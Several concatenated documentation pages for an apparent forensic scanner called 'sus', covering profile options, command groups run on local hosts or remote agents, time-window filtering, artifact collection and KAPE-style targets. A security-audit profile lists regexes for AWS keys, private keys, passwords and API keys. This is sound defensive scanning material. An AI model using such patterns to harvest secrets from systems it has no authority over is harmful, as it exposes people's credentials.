Field	Merge Behavior
`patterns`	Deduplicated based on type, pattern, and case-sensitivity
`yara-x-rules`	Deduplicated by path
`decode`	Unique decode methods are combined
`signatures`	Deduplicated by name and query
`max-file-size`	Uses the minimum value across all profiles
`tag`	Uses the first profile's tag
`include-path-globs`	Uses the first non-empty glob set
`exclude-path-globs`	Uses the first non-empty glob set

Command Execution

Profiles can define command groups to execute during analysis. Each group contains inline commands with shared settings for OS/architecture filtering, error handling, and execution targets.

Basic Command Group

[[commands]]
  name = "System Information"
  ignore-errors = true
    [[commands.commands]]
      command = "uname -a"

Group-Level Options

Option	Type	Description
`name`	String	Human-readable name for the group
`enabled`	Boolean	Whether this group is enabled (default: `true`)
`os`	Array	Operating systems to run on (e.g., `["linux", "windows", "macos"]`)
`arch`	Array	CPU architectures to run on (e.g., `["x86-64", "aarch64"]`)
`ignore-errors`	Boolean	Continue if commands fail (default: `false`)
`target`	String	Execution target: `"local"` (default), `"agent"`, or `"controller"`
`env`	Array	Environment variables as `["KEY", "value"]` pairs
`working-dir`	String	Working directory for command execution
`matrix`	Table	Optional matrix definition for running across combinations

Command Entry Options

Option	Type	Description
`command`	String	The command to execute (required)
`name`	String	Optional name (defaults to command string)
`ignore-errors`	Boolean	Override group's ignore-errors setting
`env`	Array	Additional environment variables (merged with group env)
`working-dir`	String	Override group's working directory

OS and Architecture Filtering

Groups can be filtered by operating system and CPU architecture:

# Windows-only group
[[commands]]
  name = "Windows System Info"
  os = ["windows"]
  ignore-errors = true
    [[commands.commands]]
      command = "systeminfo"

# Linux and macOS group
[[commands]]
  name = "Unix System Info"
  os = ["linux", "macos"]
    [[commands.commands]]
      command = "uname -a"

# Architecture-specific group
[[commands]]
  name = "x86_64 Only"
  arch = ["x86-64"]
    [[commands.commands]]
      command = "echo 'Running on x86_64'"

Environment Variables and Working Directory

Group-level env vars are inherited by all commands. Per-command env vars are merged on top.

[[commands]]
  name = "Custom Environment"
  os = ["linux", "macos"]
  env = [["MY_VAR", "custom_value"]]
  working-dir = "/tmp"
  ignore-errors = true
    [[commands.commands]]
      command = "echo $MY_VAR"
    [[commands.commands]]
      command = "printenv MY_VAR"
      env = [["EXTRA_VAR", "extra"]]

Inline Command Groups

Related commands are naturally grouped together within a [[commands]] entry:

[[commands]]
  name = "Hardware Info"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "lscpu"
    [[commands.commands]]
      command = "free -h"
    [[commands.commands]]
      command = "df -h"

Command Matrix

Define a matrix to run all commands in the group across multiple parameter combinations:

[[commands]]
  name = "Cross-Platform Check"
  ignore-errors = true
    [commands.matrix]
      os = ["linux", "windows"]
      arch = ["x86-64", "aarch64"]
    [[commands.commands]]
      command = "echo 'Platform-specific check'"
    [[commands.commands]]
      command = "hostname"

Execution Targets

Commands can target different execution environments:

# Run locally (default)
[[commands]]
  name = "Local Analysis"
  target = "local"
    [[commands.commands]]
      command = "python analyze.py"

# Run on remote agent
[[commands]]
  name = "Agent Collection"
  target = "agent"
    [[commands.commands]]
      command = "collect-logs.sh"

# Run on controller
[[commands]]
  name = "Controller Aggregation"
  target = "controller"
    [[commands.commands]]
      command = "aggregate-results.sh"

Complete Command Example

# Cross-platform hostname
[[commands]]
  name = "Hostname"
  ignore-errors = true
    [[commands.commands]]
      command = "hostname"

# Linux-specific diagnostics
[[commands]]
  name = "Linux Diagnostics"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "lscpu"
    [[commands.commands]]
      command = "free -h"
    [[commands.commands]]
      command = "df -h"

# macOS-specific diagnostics
[[commands]]
  name = "macOS Diagnostics"
  os = ["macos"]
  ignore-errors = true
    [[commands.commands]]
      command = "sysctl -n machdep.cpu.brand_string"
    [[commands.commands]]
      command = "df -h"

# Matrix-based diagnostics
[[commands]]
  name = "Cross-Platform Matrix"
  ignore-errors = true
    [commands.matrix]
      os = ["linux"]
      arch = ["x86-64", "aarch64"]
    [[commands.commands]]
      command = "uname -m"
    [[commands.commands]]
      command = "echo 'Platform check'"

Complete Example

# security-audit.toml - Complete security audit profile

includes = ["base.toml"]

decode = ["base64", "hex", "percent-encoding"]

max-file-size = 52428800  # 50 MiB

include-path-globs = ["**/*.java", "**/*.py", "**/*.js", "**/*.rb"]
exclude-path-globs = ["**/node_modules/**", "**/vendor/**", "**/.git/**"]

tag = "security-audit"

yara-x-rules = ["./yara-rules/malware/", "./yara-rules/credentials/"]

# AWS Credentials
[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "AWS Secret Key"
  pattern = "(?i)aws(.{0,20})?['\"][0-9a-zA-Z/+]{40}['\"]"
  type = "regex"

# Private Keys
[[patterns]]
  name = "RSA Private Key"
  pattern = "-----BEGIN RSA PRIVATE KEY-----"
  type = "string"

[[patterns]]
  name = "Generic Private Key"
  pattern = "-----BEGIN PRIVATE KEY-----"
  type = "string"

# Passwords
[[patterns]]
  name = "Password Assignment"
  pattern = "(password|passwd|pwd)\\s*=\\s*['\"][^'\"]+['\"]"
  type = "regex"
  case-insensitive = true

# API Keys
[[patterns]]
  name = "Generic API Key"
  pattern = "api[_-]?key\\s*=\\s*['\"][^'\"]+['\"]"
  type = "regex"
  case-insensitive = true

# Signatures
[[signatures]]
  name = "High Entropy Files (Possible Encrypted/Compressed)"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.5"

[[signatures]]
  name = "Large Files with Pattern Matches"
  query = "SELECT DISTINCT u.sha256 FROM unique_files u JOIN pattern_matches p ON u.sha256 = p.sha256 WHERE u.file_size > 100000"

Command Execution in Profiles

This document provides a detailed guide on using command execution features in sus profiles.

Overview

Sus profiles support executing commands during analysis. Commands are organized into groups with inline command entries. Group-level settings are inherited by all commands in the group, with optional per-command overrides.

This feature enables:

Running system diagnostics
Collecting additional context
Automating pre/post-analysis tasks
Platform-specific operations
Distributed execution across agents and controllers

Basic Usage

Commands are defined in profile TOML files using [[commands]] groups with nested [[commands.commands]] entries:

[[commands]]
  name = "System Check"
  ignore-errors = true
    [[commands.commands]]
      command = "echo 'Hello from sus'"
    [[commands.commands]]
      command = "uname -a"

Group-Level Options

Required Fields

Field	Type	Description	Example
`name`	String	Human-readable group name	`"System Info"`

Optional Fields

Field	Type	Default	Description
`enabled`	Boolean	`true`	Whether this group is enabled
`os`	Array of OsFamily	`[]`	OS filter (empty = all)
`arch`	Array of Arch	`[]`	Architecture filter (empty = all)
`ignore-errors`	Boolean	`false`	Continue on failure
`target`	String	`"local"`	Execution target
`env`	Array of [String, String]	`[]`	Environment variables
`working-dir`	String	(current)	Working directory
`matrix`	Table	(none)	Matrix definition

Command Entry Options

Field	Type	Default	Description
`command`	String	(required)	Shell command to execute
`name`	String	(command string)	Optional display name
`ignore-errors`	Boolean	(group setting)	Override group error handling
`env`	Array of [String, String]	`[]`	Additional env vars (merged with group)
`working-dir`	String	(group setting)	Override group working directory

Platform Filtering

Operating System

Groups can be restricted to specific operating systems:

# Linux only
[[commands]]
  name = "Linux Uptime"
  os = ["linux"]
    [[commands.commands]]
      command = "uptime"

# Windows only
[[commands]]
  name = "Windows Version"
  os = ["windows"]
    [[commands.commands]]
      command = "ver"

# Multiple OSes
[[commands]]
  name = "Unix Date"
  os = ["linux", "macos", "freebsd"]
    [[commands.commands]]
      command = "date"

Valid OS values: linux, windows, macos, freebsd, netbsd, openbsd, solaris, android, ios

CPU Architecture

Groups can be restricted to specific architectures:

# x86_64 only
[[commands]]
  name = "x64 Specific"
  arch = ["x86-64"]
    [[commands.commands]]
      command = "echo 'Running on x86_64'"

# Multiple architectures
[[commands]]
  name = "64-bit Systems"
  arch = ["x86-64", "aarch64"]
    [[commands.commands]]
      command = "echo '64-bit system'"

Valid architecture values: x86-64 (alias: x86_64), x86, aarch64, arm, mips64, mips, powerpc64, powerpc, riscv64, s390x

Combined Filtering

OS and architecture filters can be combined:

[[commands]]
  name = "Linux ARM64"
  os = ["linux"]
  arch = ["aarch64"]
    [[commands.commands]]
      command = "echo 'Linux on ARM64'"

Error Handling

Default Behavior

By default, commands that fail (non-zero exit code) will cause the analysis to stop:

[[commands]]
  name = "Critical Check"
    [[commands.commands]]
      command = "test -f /important/file"

Ignoring Errors

Set ignore-errors = true at the group level, or override per-command:

[[commands]]
  name = "Optional Checks"
  ignore-errors = true
    [[commands.commands]]
      command = "test -f /optional/file"
    [[commands.commands]]
      command = "critical-check"
      ignore-errors = false

Environment Variables

Group-level env vars are inherited by all commands. Per-command env vars are merged on top:

[[commands]]
  name = "Custom Environment"
  env = [["SHARED_VAR", "shared"]]
    [[commands.commands]]
      command = "echo $SHARED_VAR $CMD_VAR"
      env = [["CMD_VAR", "per-command"]]

Working Directory

Specify a working directory at the group or command level:

[[commands]]
  name = "List Temp Files"
  os = ["linux", "macos"]
  working-dir = "/tmp"
  ignore-errors = true
    [[commands.commands]]
      command = "ls -la"
    [[commands.commands]]
      command = "pwd"
      working-dir = "/var/log"

Execution Targets

Local Execution (Default)

[[commands]]
  name = "Local Command"
  target = "local"
    [[commands.commands]]
      command = "hostname"

Agent Execution

[[commands]]
  name = "Agent Commands"
  target = "agent"
    [[commands.commands]]
      command = "collect-system-info.sh"

Controller Execution

[[commands]]
  name = "Controller Commands"
  target = "controller"
    [[commands.commands]]
      command = "aggregate-results.sh"

Command Matrix

A matrix defined within a group runs all commands for each combination of matrix values. The os and arch keys filter by platform.

Basic Matrix

[[commands]]
  name = "Multi-OS Check"
    [commands.matrix]
      os = ["linux", "macos"]
    [[commands.commands]]
      command = "uname -a"

Matrix with OS and Arch

[[commands]]
  name = "Cross-Platform"
    [commands.matrix]
      os = ["linux", "windows"]
      arch = ["x86-64"]
      ignore-errors = true
    [[commands.commands]]
      command = "hostname"
    [[commands.commands]]
      command = "echo 'Platform-specific'"

Matrix Options

Option	Description
`os`	OS filter to apply to all commands
`arch`	Architecture filter to apply to all commands
`target`	Execution target to apply to all commands
`ignore-errors`	Error handling to apply to all commands

Disabled Groups

Groups can be disabled without removing them:

[[commands]]
  name = "Disabled Group"
  enabled = false
    [[commands.commands]]
      command = "echo 'This will not run'"

Complete Examples

System Diagnostics Profile

# Cross-platform hostname
[[commands]]
  name = "Hostname"
  ignore-errors = true
    [[commands.commands]]
      command = "hostname"

# Linux diagnostics
[[commands]]
  name = "Linux System"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "uname -r"
    [[commands.commands]]
      command = "lscpu"
    [[commands.commands]]
      command = "free -h"

# macOS diagnostics
[[commands]]
  name = "macOS System"
  os = ["macos"]
  ignore-errors = true
    [[commands.commands]]
      command = "sw_vers"
    [[commands.commands]]
      command = "sysctl -n machdep.cpu.brand_string"

# Windows diagnostics
[[commands]]
  name = "Windows System"
  os = ["windows"]
  ignore-errors = true
    [[commands.commands]]
      command = "ver"
    [[commands.commands]]
      command = "systeminfo"

Security Collection Profile

# User information
[[commands]]
  name = "User Info"
  os = ["linux", "macos"]
  ignore-errors = true
    [[commands.commands]]
      command = "whoami"
    [[commands.commands]]
      command = "groups"
    [[commands.commands]]
      command = "who"

# Network information
[[commands]]
  name = "Network Info"
  os = ["linux"]
  ignore-errors = true
    [[commands.commands]]
      command = "ip addr show"
    [[commands.commands]]
      command = "ss -tulpn"
    [[commands.commands]]
      command = "ss -tunp state established"

# Distributed collection via agents
[[commands]]
  name = "Agent Collection"
  os = ["linux"]
  target = "agent"
  ignore-errors = true
    [[commands.commands]]
      command = "ps aux"
    [[commands.commands]]
      command = "hostname"

Best Practices

Always set ignore-errors = true for optional commands to prevent analysis interruption
Use OS and architecture filters to ensure commands run only where they make sense
Group related commands together for better organization and shared settings
Use matrix definitions to run commands across multiple platform combinations
Test commands on target platforms before deploying profiles
Use descriptive group names to make logs and output more readable
Be cautious with agent/controller targets in distributed setups

Security Considerations

Commands run with the same privileges as the sus process
Validate command inputs if they come from untrusted sources
Be cautious with shell metacharacters and injection risks
Review commands from external profiles before use
Use target = "agent" carefully in distributed setups

Artifact Age Filtering

Time-based filtering to focus on recent activity and reduce collection scope for large systems.

Overview

The age filtering feature allows you to include or exclude files based on their modification timestamps. This is particularly useful for:

Incident Response: Focus on files modified during a specific time window
Recent Activity: Analyze only recently changed files (last 7 days, 30 days, etc.)
Performance: Reduce scope on large systems with millions of files
Timeline Narrowing: Focus analysis on relevant time periods

CLI Flags

`--modified-after <TIMESTAMP>`

Include only files modified after the specified timestamp.

Format Options:

ISO 8601: 2024-01-15T10:30:00Z
Date only: 2024-01-15
Relative: 7d (7 days ago), 30d (30 days ago), 1h (1 hour ago)

Examples:

# Files modified in last 7 days
sus /evidence --modified-after 7d

# Files modified after specific date
sus /evidence --modified-after 2024-01-15

# Files modified after specific timestamp
sus /evidence --modified-after 2024-01-15T10:30:00Z

`--modified-before <TIMESTAMP>`

Include only files modified before the specified timestamp.

Format Options:

Same as --modified-after

Examples:

# Files modified before specific date
sus /evidence --modified-before 2024-02-01

# Files modified before 30 days ago (older files)
sus /evidence --modified-before 30d

Combined Usage

Both flags can be used together to define a time window:

# Files modified between Jan 15 and Feb 1, 2024
sus /evidence --modified-after 2024-01-15 --modified-before 2024-02-01

# Files modified in the last 7 days but not today
sus /evidence --modified-after 7d --modified-before 1d

# Recent activity window (7-30 days ago)
sus /evidence --modified-after 30d --modified-before 7d

Relative Time Syntax

Relative timestamps are calculated from the current time:

Suffix	Meaning	Example	Description
`h`	Hours	`24h`	24 hours ago
`d`	Days	`7d`	7 days ago
`w`	Weeks	`2w`	2 weeks ago (14 days)
`m`	Months	`3m`	3 months ago (≈90 days)
`y`	Years	`1y`	1 year ago (365 days)

Examples:

# Last 24 hours
sus /path --modified-after 24h

# Last week
sus /path --modified-after 1w

# Last month
sus /path --modified-after 1m

# Last year
sus /path --modified-after 1y

Use Cases

Incident Response

Focus on files modified during the incident timeframe:

sus /compromised-system \
    --modified-after 2024-01-13 \
    --modified-before 2024-01-27 \
    --target KAPE_Triage \
    --collect \
    --generate-timeline json

Recent Malware Analysis

Analyze only recently modified executables:

# Check for new executables in last 7 days
sus /system \
    --modified-after 7d \
    --profile profiles/base/malware.toml \
    --include-path-globs "*.exe" \
    --include-path-globs "*.dll" \
    --triage-report

Performance Optimization

Reduce scope on large systems:

# Only analyze recently active files on large share
sus /large-file-server \
    --modified-after 30d \
    --profile profiles/composite/security-audit.toml

Pre/Post Activity Comparison

Compare file changes before and after a specific event:

# Before the update (files older than 7 days)
sus /system --modified-before 7d --output-dir ./before

# After the update (files modified in last 7 days)
sus /system --modified-after 7d --output-dir ./after

Integration with Other Features

With Artifact Collection

sus /evidence \
    --modified-after 2024-01-15 \
    --collect \
    --output-dir ./investigation

With Timeline Generation

sus /evidence \
    --modified-after 7d \
    --generate-timeline csv \
    --timeline-output recent_activity.csv

With Registry Parsing

sus /windows/system32/config \
    --modified-after 30d \
    --parse-registry \
    --registry-output recent_registry.csv

With Event Log Parsing

sus /windows/system32/winevt \
    --modified-after 2024-01-15 \
    --parse-evtx \
    --evtx-summary

With Triage Scoring

sus /evidence \
    --modified-after 7d \
    --triage-report \
    --triage-min-score 70 \
    --collect

Combined Forensic Workflow

Complete forensic analysis focused on recent activity:

sus /evidence \
    --modified-after 2024-01-15T00:00:00Z \
    --modified-before 2024-01-22T23:59:59Z \
    --target KAPE_Triage \
    --collect \
    --system-snapshot \
    --generate-timeline json \
    --parse-registry \
    --parse-evtx \
    --triage-report \
    --web-ui

Performance Considerations

Impact

Age filtering happens early in the file traversal process, providing significant performance benefits:

Reduced I/O: Files outside the time window are skipped before content analysis
Lower Memory: Fewer files loaded into memory
Faster Analysis: Only relevant files are processed
Smaller Database: Analysis database contains only filtered files

Benchmarks

Typical performance improvements on large datasets:

Dataset Size	Time Window	Files Analyzed	Time Saved
1M files	Last 7 days	~50K (5%)	~95% faster
5M files	Last 30 days	~500K (10%)	~90% faster
10M files	Last 24 hours	~10K (0.1%)	~99% faster

Best Practices

Use Relative Times: Easier to specify and understand
Combine with Path Globs: Further reduce scope
Start Narrow: Begin with short time windows, expand if needed
Monitor Output: Check filtered file count to ensure not too restrictive

Timestamp Source

The age filter uses the file's modification timestamp (mtime) from filesystem metadata:

Modified Time: When file content was last changed
Not Access Time: Access time is not used (often disabled on modern systems)
Not Creation Time: Creation time varies by platform and is less reliable
Example:

# Explicit UTC
sus /evidence --modified-after 2024-01-15T10:30:00Z

# Local time (midnight)
sus /evidence --modified-after 2024-01-15

# Relative to now (always clear)
sus /evidence --modified-after 7d

Platform Support

Platform	Modification Time	Notes
Linux	✅ Full support	Standard `st_mtime`
macOS	✅ Full support	Standard `st_mtime`
Windows	✅ Full support	NTFS modification time

Limitations

Timestamp Manipulation

Attackers can modify file timestamps to evade detection:

# Modified timestamps may not be trustworthy in adversarial environments
# Use in combination with other indicators
sus /evidence \
    --modified-after 7d \
    --parse-registry \
    --parse-evtx \
    --triage-report

Mitigation: Cross-reference with:

Event log timestamps
Registry artifact timestamps
File system journal data
Timeline analysis

Archive Files

Modification time for archive members is from extraction, not original modification:

# Archives expanded to temporary directories may have recent mtimes
# even though contained files are old

Workaround: Use separate analysis for archives vs. filesystem

Timezone Considerations

All timestamps are interpreted in local system time:

ISO 8601 timestamps with Z suffix are UTC
Date-only formats assume local midnight
Relative times calculate from current local time

Example:

# Explicit UTC
sus /evidence --modified-after 2024-01-15T10:30:00Z

# Local time (midnight)
sus /evidence --modified-after 2024-01-15

# Relative to now (always clear)
sus /evidence --modified-after 7d

Troubleshooting

No Files Found

If filtering returns zero files:

Check timestamp format: Ensure correct ISO 8601 or relative format
Verify time window: May be too restrictive
Check timezone: Ensure UTC vs local time is correct
List verbose: Use -v to see which files are being filtered

# Debug mode to see filtering
sus /path --modified-after 7d -vv

Too Many Files

If filtering returns too many files:

Narrow time window: Reduce the time range
Add path globs: Combine with --include-path-globs
Use other filters: Combine with --max-file-size
Check relative calc: Verify relative timestamps are calculating correctly

Security Considerations

Timestamp Trust

Do not rely solely on modification timestamps for security decisions:

Timestamps can be easily modified by attackers
System clock skew can affect relative time calculations
Some filesystems have limited timestamp precision

Recommendation: Use age filtering for performance and convenience, not as a security control.

Forensic Integrity

When collecting evidence:

# Always preserve original timestamps
sus /evidence \
    --modified-after 2024-01-15 \
    --collect \
    --system-snapshot \
    --generate-timeline json

The --collect flag preserves original file metadata in the manifest, including the original modification time.

Artifact Collection Feature

Overview

The artifact collection feature allows sus to copy files that match analysis patterns while preserving their metadata. This is inspired by forensic tools like UAC (Unix-like Artifacts Collector) and KAPE (Kroll Artifact Parser and Extractor).

Usage

Enable artifact collection with the --collect flag:

# Basic collection
sus /path/to/analyze --collect --output-dir ./investigation

# With profiles
sus /evidence --profile profiles/composite/forensic-investigation.toml --collect --output-dir ./collected

# Incident response collection
sus /compromised-system --profile profiles/composite/incident-response.toml --collect

Output Structure

When collection is enabled, artifacts are organized in the output directory:

output/
├── analysis.db              # Analysis database
├── files/                   # Analyzed file metadata
├── collected/               # Collected artifacts (NEW)
│   ├── default/            # Files without specific tags
│   ├── server1/            # Files tagged as 'server1'
│   └── manifest.json       # Collection manifest
└── manifest.json           # Artifact manifest

Artifact Organization

Collected artifacts are organized by tag and filename:

Files are grouped by their assigned tags (using --tag-dir option)
Filenames include SHA256 hash to prevent conflicts
Original directory structure is flattened for easier review

Example:

collected/
├── server1/
│   ├── a1b2c3d4...xyz_suspicious.exe
│   ├── e5f6g7h8...abc_malware.dll
│   └── ...
└── server2/
    ├── 9i0j1k2l...def_backdoor.sh
    └── ...

Artifact Manifest

The manifest (collected/manifest.json) contains detailed information about each collected artifact:

{
  "version": "1.0",
  "collection_started": "2024-01-15T10:30:00Z",
  "collection_completed": "2024-01-15T11:45:00Z",
  "artifact_count": 42,
  "total_size": 1048576,
  "artifacts": [
    {
      "original_path": "/path/to/file.exe",
      "collected_path": "/output/collected/server1/abc123...xyz_file.exe",
      "sha256": "abc123...",
      "file_size": 24576,
      "created": "2024-01-10T08:00:00Z",
      "modified": "2024-01-14T15:30:00Z",
      "accessed": "2024-01-15T10:25:00Z",
      "permissions": 755,
      "uid": 1000,
      "gid": 1000,
      "collection_timestamp": "2024-01-15T10:35:00Z",
      "tag": "server1",
      "mime_type": "application/x-executable"
    }
  ],
  "notes": []
}

Metadata Preservation

The collection feature preserves file metadata:

All Platforms

File size
Creation time (if available)
Modification time
Access time
SHA256 hash
MIME type

Unix/Linux

File permissions (mode)
User ID (UID)
Group ID (GID)

Notes

Ownership preservation (chown) typically requires root privileges
Timestamps are preserved where the filesystem supports it
Symbolic links are not followed (only their metadata is collected)

Collection Process

Analysis Phase: Files are analyzed normally using profiles and patterns
Pattern Matching: Files with pattern matches are identified
Collection Phase: During cleanup, matched files are collected:
- Query database for files with pattern matches
- Exclude extracted/decoded files (collect originals only)
- Copy files while preserving metadata
- Create manifest records
Manifest Saving: Complete manifest is saved as JSON

Filtering

Collection automatically filters files:

Only files with pattern matches are collected
Extracted files from archives are excluded (originals collected instead)
Decoded files are excluded (originals collected instead)
Files that no longer exist are skipped

Integration with Profiles

Collection works with all profiles:

# Collect malware samples
sus /samples --profile profiles/base/malware.toml --collect

# Collect PII violations
sus /data --profile profiles/composite/pci-compliance.toml --collect

# Comprehensive forensic collection
sus /evidence --profile profiles/composite/forensic-investigation.toml --collect

Use Cases

Incident Response

Collect evidence of compromise:

sus /var/log --profile profiles/composite/incident-response.toml \
    --collect --output-dir ./ir-evidence

Compliance Auditing

Collect files with PII or sensitive data:

sus /share/documents --profile profiles/composite/pci-compliance.toml \
    --collect --output-dir ./compliance-violations

Malware Triage

Collect suspicious executables:

sus /downloads --profile profiles/base/malware.toml \
    --collect --output-dir ./malware-samples

Multi-System Collection

Tag and collect from multiple systems:

sus /mnt/server1 --tag-dir '/mnt/server1:server1' \
    /mnt/server2 --tag-dir '/mnt/server2:server2' \
    --profile profiles/composite/forensic-investigation.toml \
    --collect --output-dir ./multi-system-collection

Chain of Custody

The manifest provides chain of custody information:

Original file path and collection time
File hashes for integrity verification
Metadata snapshots at collection time
Collection version and tool information

Performance Considerations

Collection happens after analysis completes
Files are copied using spawn_blocking for async efficiency
Large files are handled with memory-mapped I/O during analysis
Manifest is written once at the end of collection

Security Considerations

Collected files may contain malware - handle with care
Collection does not sanitize or quarantine files
Preserve the collected directory with appropriate permissions
Consider encrypting the collected artifacts directory
Verify manifest hashes before using collected artifacts

Limitations

Does not create forensic images (E01, AFF) - files are copied as-is
Does not preserve NTFS Alternate Data Streams (ADS)
Does not preserve extended attributes on all platforms
Requires sufficient disk space for collected artifacts
Ownership preservation requires appropriate privileges

Future Enhancements

Planned improvements:

Support for forensic image formats (E01, AFF)
Preservation of NTFS ADS and extended attributes
Encryption of collected artifacts
Compression of collection
Incremental collection (collect only new matches)
Collection reports in PDF/HTML format

Example Workflow

Complete incident response workflow:

# 1. Analyze and collect
sus /compromised-system \
    --profile profiles/composite/incident-response.toml \
    --collect \
    --output-dir ./ir-$(date +%Y%m%d-%H%M%S)

# 2. Review manifest
cat ./ir-*/collected/manifest.json | jq '.artifact_count'

# 3. Extract specific artifacts
cat ./ir-*/collected/manifest.json | \
    jq -r '.artifacts[] | select(.mime_type | contains("executable")) | .collected_path'

# 4. Generate report
sus --server-only --output-dir ./ir-*
# Access http://localhost:8080 to review findings

Troubleshooting

No artifacts collected

Verify files match patterns (check analysis.db)
Ensure --collect flag is specified
Check file permissions for reading source files

Missing metadata

Some filesystems don't support all metadata
Creation time may not be available on all platforms
Extended attributes require platform-specific support

Permission errors

Ensure read access to source files
Ensure write access to output directory
Ownership preservation requires root/admin

Disk space issues

Monitor available space before collection
Use --max-file-size to limit large files
Consider selective profiles to reduce matches

Compound Targets and Module System

This document describes the enhanced profile system with dynamic compound targets and module references, inspired by KAPE's target system.

Compound targets/module system

Current State: Profile includes work but are static KAPE Feature: Dynamic compound targets that combine multiple modules Recommendation:

Enhance profile system with module references
Allow runtime target selection (e.g., "collect all browser artifacts")
Support for KAPE target format compatibility

KAPE target/module compatibility

Current State: Custom TOML format KAPE Feature: Standard target/module format Recommendation:

Import KAPE target definitions
Convert KAPE modules to sus profiles
Leverage existing KAPE community targets
Bidirectional conversion tools

│ ├── security-audit.toml │ └── ... ├── modules/ # Reusable modules (NEW) │ ├── browser/ │ │ ├── chrome.toml │ │ ├── firefox.toml │ │ └── all-browsers.toml │ ├── windows/ │ │ ├── registry.toml │ │ ├── execution.toml │ │ └── event-logs.toml │ └── ... └── targets/ # Named compound targets (NEW) ├── KAPE_Triage.toml ├── Quick_Triage.toml └── KAPE_BrowserHistory.toml


## Usage

### Basic Usage

```bash
# Use a named target
sus /path --target KAPE_Triage

# Use multiple targets
sus /path --target Quick_Triage --target KAPE_BrowserHistory

# Combine target with profile
sus /path --profile base/malware.toml --target browser/chrome

# List available targets
sus --list-targets

# Show target details
sus --show-target KAPE_Triage

Advanced Usage

# Enable specific modules
sus /path --target KAPE_Triage --enable-module windows/registry

# Disable modules
sus /path --target KAPE_Triage --disable-module browser/*

# Pattern matching for modules
sus /path --target windows/*

# Combine with collection
sus /path --target KAPE_Triage --collect --output-dir ./triage

Module Format

Modules extend the standard profile TOML format with metadata:

# modules/browser/chrome.toml

[module]
name = "Chrome Browser Artifacts"
description = "Chrome/Chromium history, cookies, login data"
category = "browser"
platform = ["windows", "linux", "macos"]
priority = "high"

# Optional: Dependencies on other modules
dependencies = [
  "common/sqlite-databases"
]

# Standard profile settings
decode = ["base64", "percent-encoding"]

[[patterns]]
  name = "Chrome History"
  pattern = "Chrome.*History"
  type = "regex"

# ... more patterns

Module Metadata Fields

name - Display name for the module
description - Brief description of what the module collects
category - Module category (browser, windows, linux, memory, etc.)
platform - Supported platforms (windows, linux, macos)
priority - Loading priority (critical, high, medium, low)
dependencies (optional) - Other modules required

Target Format

Targets define compound collections with module references:

# targets/KAPE_Triage.toml

[target]
name = "KAPE_Triage"
description = "Comprehensive forensic triage"
category = "triage"
priority = "critical"

# Modules to load (can be selectively enabled/disabled)
modules = [
  "windows/registry",
  "windows/execution",
  "browser/all-browsers"
]

# Optional modules (loaded only if explicitly enabled)
modules_optional = [
  "windows/event-logs"
]

# Static includes (always loaded)
includes = [
  "../base/malware.toml",
  "../base/credentials.toml"
]

# Target-specific patterns
[[patterns]]
  name = "Triage Marker"
  pattern = "triage"
  type = "string"

[[signatures]]
  name = "High Value Artifacts"
  query = "SELECT sha256 FROM pattern_matches WHERE ..."

Target Metadata Fields

name - Target name (used with --target flag)
description - What this target collects
category - Target category
priority - Execution priority
modules - List of module paths to include
modules_optional - Modules loaded only when explicitly enabled
includes - Static profile includes

Module Resolution

When a target or module is specified:

Resolve path - Convert browser/chrome to profiles/modules/browser/chrome.toml
Load dependencies - Recursively load any dependencies
Merge patterns - Combine all patterns with deduplication
Apply filters - Honor --enable-module and --disable-module flags
Compile - Build pattern matchers and YARA rules

Path Resolution Rules

Relative paths are relative to profiles/modules/
Glob patterns supported: browser/*, windows/event-*
Named targets searched in profiles/targets/
Fallback to profiles/ for backward compatibility

KAPE Compatibility

Named Target Mapping

KAPE Target	Sus Target	Description
`!SANS_Triage`	`KAPE_Triage`	Comprehensive triage
`_BasicCollection`	`Quick_Triage`	Fast triage
`BrowserHistory`	`KAPE_BrowserHistory`	All browsers
`EvidenceOfExecution`	`KAPE_EvidenceOfExecution`	Windows execution
`RegistryHives`	`windows/registry`	Registry artifacts
`EventLogs`	`windows/event-logs`	Event logs

KAPE Target Format Support

Future enhancement: Support loading KAPE .tkape files directly:

# Load KAPE target file (planned)
sus /path --kape-target path/to/target.tkape

Runtime Module Selection

Enable Specific Modules

# Enable only Chrome browser artifacts
sus /path --target KAPE_Triage --enable-module browser/chrome

# Enable multiple modules
sus /path --target KAPE_Triage \
  --enable-module browser/chrome \
  --enable-module browser/firefox

Disable Modules

# Disable event logs to speed up collection
sus /path --target KAPE_Triage --disable-module windows/event-logs

# Disable all browser modules
sus /path --target KAPE_Triage --disable-module browser/*

Pattern Matching

# All Windows modules
sus /path --target windows/*

# All browser modules
sus /path --target browser/*

# Specific pattern
sus /path --target windows/event-*

Module Categories

browser

chrome.toml - Chrome/Chromium artifacts
firefox.toml - Firefox artifacts
edge.toml - Microsoft Edge artifacts
safari.toml - Safari artifacts (macOS)
all-browsers.toml - All browser artifacts

windows

registry.toml - Registry hives and keys
execution.toml - Execution artifacts (Prefetch, ShimCache, BAM/DAM)
event-logs.toml - Event log files (.evtx)
ntfs.toml - NTFS artifacts (planned)
persistence.toml - Persistence mechanisms (planned)

linux

logs.toml - System logs (planned)
bash-history.toml - Shell history (planned)
systemd.toml - Systemd artifacts (planned)

memory

dumps.toml - Memory dumps (planned)
hibernation.toml - Hibernation files (planned)

email

outlook.toml - Outlook PST/OST (planned)
thunderbird.toml - Thunderbird artifacts (planned)

Creating New Modules

Step 1: Create Module File

# Create module in appropriate category
mkdir -p profiles/modules/email
touch profiles/modules/email/outlook.toml

Step 2: Define Module Metadata

[module]
name = "Outlook Email Artifacts"
description = "Microsoft Outlook PST/OST files"
category = "email"
platform = ["windows"]
priority = "medium"

Step 3: Add Patterns

[[patterns]]
  name = "PST File"
  pattern = "\\.pst$"
  case-insensitive = true
  type = "regex"

Step 4: Test Module

# Test module standalone
sus /test/email --target email/outlook

# Test in combination
sus /test --target email/outlook --target browser/chrome

Creating Named Targets

Step 1: Create Target File

touch profiles/targets/My_Custom_Target.toml

Step 2: Define Target

[target]
name = "My_Custom_Target"
description = "Custom forensic collection"
category = "custom"
priority = "high"

modules = [
  "browser/all-browsers",
  "windows/execution"
]

includes = [
  "../base/malware.toml"
]

[[patterns]]
  name = "Custom Pattern"
  pattern = "custom"
  type = "string"

Step 3: Use Target

sus /path --target My_Custom_Target --collect

